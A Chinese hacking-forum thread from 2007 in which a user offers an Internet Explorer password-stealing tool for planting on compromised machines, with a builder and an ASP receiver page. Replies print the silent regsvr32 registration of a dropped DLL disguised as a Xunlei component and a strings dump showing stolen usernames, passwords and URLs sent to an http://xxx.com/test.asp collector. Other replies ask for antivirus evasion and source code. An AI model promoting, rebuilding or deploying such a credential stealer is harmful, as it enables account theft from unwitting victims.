发新话题
打印

[原创]抛一个获取IE密码小工具 也许渗透时用得着

[原创]抛一个获取IE密码小工具 也许渗透时用得着

软件作者:xiao2004
文章来源:邪恶八进制信息安全团队(www.eviloctal.com

费话不多说,这是一个利用Com来获取IE密码的工具,应该要比键盘记录爽点.
用CreateExe.exe生出exe程序后用upack压一下,大概是29K的样子,test.asp为接收文件
90%的网站都能搞定,搞到肉鸡时,给他放一个,说不定能有所收获,什么网站后台呀,邮箱呀,或者是他的马马哦...

这一版先到这,接下来是捕获应用软件的密码,向密码解霸看齐了...

附件

IE.rar (56 KB)

2007-3-11 22:03, 下载次数: 588

TOP

生成好的文件捆绑检查:
开始分析...
文件位置:C:\Documents and Settings\Administrator\桌面\IE\sss.exe
文件长度:114689Byte(s)

文件头部分析...
可执行头部数:2个
文件可能经过捆绑,请小心使用!

分析全部结束

why?

TOP

引用:
引用第3楼sniper于2007-03-11 23:35发表的 :
生成好的文件捆绑检查:
开始分析...
文件位置:C:Documents and SettingsAdministrator桌面IEsss.exe
文件长度:114689Byte(s)

.......
他这个生成器 资源文件里应该有个等待配置的EXE资源
2个文件头正常.

TOP

应该不是什么木马程序。。

我看了下。释放出了两个文件。 一个是cmdd.bat 一个是 XunLeiBHO_001.dll

regsvr32 /c /s XunLeiBHO_001.dll
winexec cmdd.bat

cmdd.bat 实现自删除。

附件

XunLeiBHO_001.rar (23 KB)

2007-3-12 15:26, 下载次数: 45

cmdd.rar (1 KB)

2007-3-12 15:26, 下载次数: 43

安全就象毒品一样,上瘾了就戒不掉了 http://www.6code.net

TOP

引用:
引用第1楼sniper于2007-03-11 23:35发表的 :
生成好的文件捆绑检查:
开始分析...
文件位置:C:Documents and SettingsAdministrator桌面IEsss.exe
文件长度:114689Byte(s)

.......
真是搞笑,你认为软件的作者如果真要加后门,还需要做捆绑吗?

TOP

引用:
引用第4楼zhouzhen于2007-03-12 15:26发表的 :
应该不是什么木马程序。。

我看了下。释放出了两个文件。 一个是cmdd.bat 一个是 XunLeiBHO_001.dll

regsvr32 /c /s XunLeiBHO_001.dll
.......
XunLeiBHO_001.dll就是木马啊...试图伪装成迅雷的DLL;用OD载入随便看一下就知道了...

TOP

不知道作者是用的什么加壳工具?生成的文件根本没后
     .%s?u
  ser=%s&pass=%s&p
ass1=%s&title=%s
  &url=%s.Wininet.
dll.IEXPLORE.EXE
  "%s?user=.....
. %s&pass=%s&pas
000153B0  73 31 3D 25 73 26 74 69 74 6C 65 3D 25 73 26 75  s1=%s&title=%s&u
000153C0  72 6C 3D 25 73 22 00 00              rl=%s"..门请大家放心!在这里小弟请教一下是什么意思?真正连接的url是http://xxx.com/test.asp后面跟的参数具体是什么?
love hack

TOP

请大家在发表言论的时候多斟酌一下。 或许现在风气不好,但是毛主席告诉我们没有调查就没有发言权。
安全就象毒品一样,上瘾了就戒不掉了 http://www.6code.net

TOP

我是2003的系统,貌似没收到密码。

TOP

敢问是属于嗅叹还是记录呢?

TOP

不知道XunLeiBHO_001.dll怎么进行工作的,看不明白,作者有空讲讲吧

TOP

测试平台呢!!!~~~~ 合适系统平台呢!!!~~~ BUG呢!!
小弟菜 麻烦说下哦!!!~~~

TOP

是個好東西·!
不過,好像支持中文,e文,不支持韓文!!!!支持作者!!!

TOP

win2003的环境下,登陆YAHOO的邮箱,没看到发信,也没收到信!
safdafda

TOP

那位大大给帮忙给里面释放的DLL免杀下??? 愿意的联系小弟Q234274799 。。 不胜感激。。。。
fuck you

TOP

是用的那个WNetEnumCachedPasswords函数吗?我delphi写的时候编译成功,运行却出现“无法定位程序输入点于动态链接库mpr”上呢?请指教.
原来XP里面的DLL已经取消了这个函数了,谁POST一个2000的mpr.dll上来啊。谢谢

TOP

对 DLL 的免杀  作者怎么做的 呢
能说下么
只做安静的观众

TOP

xp 收不到163的信箱

TOP

楼主有源码吗 有的话联系我下啊

TOP

发新话题